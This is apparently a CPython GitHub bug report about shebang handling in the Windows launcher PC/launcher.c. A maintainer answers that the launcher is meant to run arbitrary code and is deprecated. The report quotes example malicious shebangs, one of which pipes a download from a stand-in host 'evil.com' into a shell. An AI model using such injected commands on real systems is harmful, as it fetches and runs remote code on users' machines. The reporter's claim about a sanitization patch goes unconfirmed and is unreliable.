PC/launcher.c: command injection via unsanitized shebang still present in current main branch (mitigated in released versions)

[rgfegegeegege]

Bug report

Bug description:

Hi team,

I noticed that the current main branch of PC/launcher.c (as of January 2025/2026) does not include the shebang sanitization patch that prevents arbitrary command execution via malicious shebang lines (e.g. #!python -c "os.system('calc.exe')" or worse #!/bin/sh; curl evil.com | sh # python).

In released Python versions (3.13+, 3.12.4+, 3.11.9+), the launcher correctly warns and restricts shebangs that do not match supported Python templates

CPython versions tested on:

CPython main branch

Operating systems tested on:

Windows

[VanshAgarwal24036]

Can a maintainer confirm whether this issue is already fixed in main?
I compared PC/launcher.c in main vs 3.13 and they appear identical with
respect to shebang handling.

[zooba]

The launcher is intended to run arbitrary code. If that arbitrary code contains an untrusted shebang, it's every bit as bad as if it contains untrusted code.

The launcher in the main branch is also deprecated, so we aren't going to change it any further. And PC/launcher.c is even more deprecated - launcher2.c has been the implementation that's been released for a while now.